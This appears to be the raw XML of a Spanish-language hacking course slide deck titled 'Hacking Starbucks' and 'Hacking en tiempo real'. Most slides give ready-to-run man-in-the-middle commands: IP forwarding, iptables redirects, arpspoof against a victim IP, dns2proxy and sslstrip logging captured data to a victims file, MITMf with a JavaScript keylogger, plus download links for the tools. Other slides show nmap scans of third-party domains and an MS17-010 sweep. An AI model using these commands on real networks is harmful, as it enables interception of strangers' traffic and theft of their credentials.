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60" r:id="rId4"/>
    <p:sldId id="265" r:id="rId5"/>
    <p:sldId id="307" r:id="rId6"/>
    <p:sldId id="308" r:id="rId7"/>
    <p:sldId id="309" r:id="rId8"/>
    <p:sldId id="320" r:id="rId9"/>
    <p:sldId id="310" r:id="rId10"/>
    <p:sldId id="321" r:id="rId11"/>
    <p:sldId id="322" r:id="rId12"/>
    <p:sldId id="323" r:id="rId13"/>
    <p:sldId id="324" r:id="rId14"/>
    <p:sldId id="325" r:id="rId15"/>
    <p:sldId id="326" r:id="rId16"/>
    <p:sldId id="312" r:id="rId17"/>
    <p:sldId id="314" r:id="rId18"/>
    <p:sldId id="315" r:id="rId19"/>
    <p:sldId id="319" r:id="rId20"/>
    <p:sldId id="327" r:id="rId21"/>
    <p:sldId id="328" r:id="rId22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24/05/2020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60257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24/05/2020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95559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24/05/2020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79670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24/05/2020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9896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24/05/2020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7540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24/05/2020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17201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24/05/2020</a:t>
            </a:fld>
            <a:endParaRPr lang="es-P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25038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24/05/2020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224761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24/05/2020</a:t>
            </a:fld>
            <a:endParaRPr lang="es-P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26492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24/05/2020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23980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24/05/2020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803779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D1BE0-AB3B-4531-9085-7A6BB0A907E2}" type="datetimeFigureOut">
              <a:rPr lang="es-PE" smtClean="0"/>
              <a:t>24/05/2020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36553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softperfect.com/products/networkscanner/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1021845" y="3341894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4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CURSO 02</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="54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HACKING STARBUCKS</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="5400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF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293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189470" y="3509963"/>
            <a:ext cx="11813060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7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01</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="5500" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF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es-PE" sz="36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echo “1” &gt; /proc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="36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sys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="36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/net/ipv4/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="36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ip_forward</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE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3563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646670" y="3577969"/>
            <a:ext cx="10898660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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="54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02</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-PE" sz="28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iptables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="28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-t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="28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nat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="28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-A PREROUTING -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="28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tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="28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--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="28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destination-port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="28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80 -j REDIRECT --to-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="28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port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="28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9000</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="4400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8895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288324" y="3536137"/>
            <a:ext cx="11557687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7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03</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="5500" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF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es-PE" sz="28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iptables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="28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-t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="28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nat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="28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-A PREROUTING -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="28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udp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="28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--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="28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destination-port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="28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53 -j REDIRECT --to-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="28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port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="28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53</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="4400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7162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288324" y="3536137"/>
            <a:ext cx="11557687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7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04</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="5500" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF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es-PE" sz="32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arpspoof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="32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-i eth0 -t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="32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ipvictima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="32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es-PE" sz="32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ipgateway</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="32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-r</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="5400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688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288324" y="3536137"/>
            <a:ext cx="11557687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7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05</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="5500" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF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es-PE" sz="24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python dns2proxy.py</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="4400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923834" y="5323701"/>
            <a:ext cx="83443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2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.mediafire.com/file/a7wga4ov7w57d7h/dns2proxy-master.zip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30446672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288324" y="3536137"/>
            <a:ext cx="11557687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7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06</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="5500" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF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es-PE" sz="24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python sslstrip.py -l 9000 -a -w victimas.txt</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="4400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316405" y="5207949"/>
            <a:ext cx="79083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2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.mediafire.com/file/5k2o85jk5r5n3rd/sslstrip2-master.zip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31932312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1087749" y="4244592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72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HACKING EN TIEMPO REAL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES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NIVEL III</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE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6221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2096529" y="5349875"/>
            <a:ext cx="799894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PRE-INSTALACIÓN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="2000" b="1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apt-get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update</a:t>
            </a:r>
            <a:b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es-ES" sz="2000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apt-get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upgrade</a:t>
            </a:r>
            <a:b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es-ES" sz="2800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apt-get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install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python-dev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python-setuptools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libpcap0.8-dev </a:t>
            </a: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libnetfilter-queue-dev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libssl-dev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libjpeg-dev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libxml2-dev libxslt1-dev libcapstone3 </a:t>
            </a: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libcapstone-dev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libxml2-dev libxslt1-dev</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:b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pip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install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virtualenvwrapper</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2000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b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source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/usr/local/bin/virtualenvwrapper.sh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:b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mkvirtualenv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MITMf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-p /</a:t>
            </a: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usr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/</a:t>
            </a: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bin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/python2.7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:b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pip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install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requests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[</a:t>
            </a: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security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1276851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2389150" y="4129267"/>
            <a:ext cx="7413700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INSTALACIÓN MITMF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="es-ES" sz="20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git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clone https://github.com/byt3bl33d3r/MITMf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="2000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cd </a:t>
            </a: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MITMf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&amp;&amp; </a:t>
            </a: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git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submodule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init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&amp;&amp; </a:t>
            </a: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git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submodule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update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–</a:t>
            </a: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recursive</a:t>
            </a:r>
            <a:b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es-ES" sz="2000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pip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install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-r requirements.txt</a:t>
            </a:r>
            <a:b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es-ES" sz="2000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python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mitmf.py --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-E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help</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2000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6609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1701115" y="4527894"/>
            <a:ext cx="8789770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OPCIÓN 01 (CLASE EN VIVO)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-U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python mitmf.py -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-U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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-U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eth0 --spoof --arp --gateway 192.168.1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" b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OPCIÓN 02 (DIRIGIDO A UNA VICTIMA)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-U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python mitmf.py -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-U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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-U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eth0 --spoof --arp --gateway 192.168.1.1 --target ipvictima</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" b="1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OPCIÓN 03 (KEYLOGGER) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF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python mitmf.py -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2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eth0 --spoof --arp --gateway 192.168.1.1 --target ipvictima --jskeylogger</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="20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513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1087749" y="3840935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96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NMAP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="54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NIVEL I</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="5400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591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1087749" y="4244592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72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HACKING SCAN WINDOWS (Extra)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="7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NIVEL III</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="7000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8103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427" y="1256518"/>
            <a:ext cx="4857143" cy="134285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835" y="3071167"/>
            <a:ext cx="2322928" cy="1239632"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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693914" y="5033356"/>
            <a:ext cx="10804170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Hacking Android StarBucks</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="4800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4449CD79-A564-440B-B397-365220A1146B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2308871" y="702778"/>
            <a:ext cx="75742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https://www.softperfect.com/products/networkscanner/</a:t>
            </a:r>
            <a:endParaRPr lang="es-E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725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72417" y="3824460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01</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-PE" sz="48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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="48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-A 192.168.1.2 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-PE" sz="48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es-PE" sz="48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(tu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="48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ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="48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privada)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1100101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1013607" y="3906838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02</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-PE" sz="48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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="48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--script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="48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dns-brute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="48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Facebook.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2670369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4195168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03</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-PE" sz="44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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="44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--script=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="44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firewalk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="44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--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="44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traceroute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="44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--script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="44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args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="44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=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="44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firewalk.max-retries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="44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=1 treeknow.com</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="6600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366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3536137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04</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-PE" sz="44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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="44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--script http-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="44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sitemap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="44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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="44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generator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="44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portalhacker.net -p 80</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="6600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721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3536137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05</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-PE" sz="44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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="44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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="44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sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="44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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="44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vv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="44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-d -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="44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sC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="44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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="44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sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="44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-O </a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="6700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666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3799753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7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06</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="5500" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF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es-PE" sz="4400" b="1" dirty="0" err="1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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="44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–p445 --script smb-vuln-ms17-010 192.168.1.0/24</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="6700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808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1087749" y="4244592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72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HACKING EN TIEMPO REAL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="70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NIVEL II</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="7000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2171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3842</TotalTime>
  <Words>411</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Panorámica</PresentationFormat>
  <Paragraphs>61</Paragraphs>
  <Slides>21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6" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Black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Martinez</dc:creator>
  <cp:lastModifiedBy>Daniel Martinez</cp:lastModifiedBy>
  <cp:revision>116</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-04-12T23:17:21Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-05-25T00:31:44Z</dcterms:modified>
</cp:coreProperties>
</file>